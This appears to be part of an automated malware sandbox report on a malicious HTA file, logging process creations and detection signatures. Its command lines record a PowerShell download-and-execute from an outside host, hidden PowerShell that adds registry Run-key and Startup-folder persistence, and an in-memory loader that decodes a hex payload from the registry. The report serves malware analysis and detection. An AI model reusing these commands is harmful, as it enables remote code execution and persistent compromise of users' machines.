Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini filesShow sources
Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: microsoft.htavirustotal: Detection: 10%
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'C:\Users\user\Desktop\microsoft.hta'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs' Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: unknown unknown
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: iexplore.pdb UGP source: mshta.exe, 00000001.00000003.1823878968.02A7E000.00000004.sdmp
Source: Binary string: scrrun.pdb source: wscript.exe, 00000006.00000002.2059560819.006A0000.00000002.sdmp
Source: Binary string: iexplore.pdb UGP source: mshta.exe, 00000001.00000003.1620046534.001D3000.00000004.sdmp, microsoft.hta
Source: Binary string: wscript.pdb source: wscript.exe, 00000006.00000002.2058746695.002B0000.00000002.sdmp
Source: Binary string: wscript.pdbN source: wscript.exe, 00000006.00000002.2058746695.002B0000.00000002.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.1650297060.018E0000.00000002.sdmp, powershell.exe, 00000007.00000002.2065449016.01C10000.00000002.sdmp

Data Obfuscation:

barindex
Powershell starts a process from the temp directoryShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''Jump to behavior
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
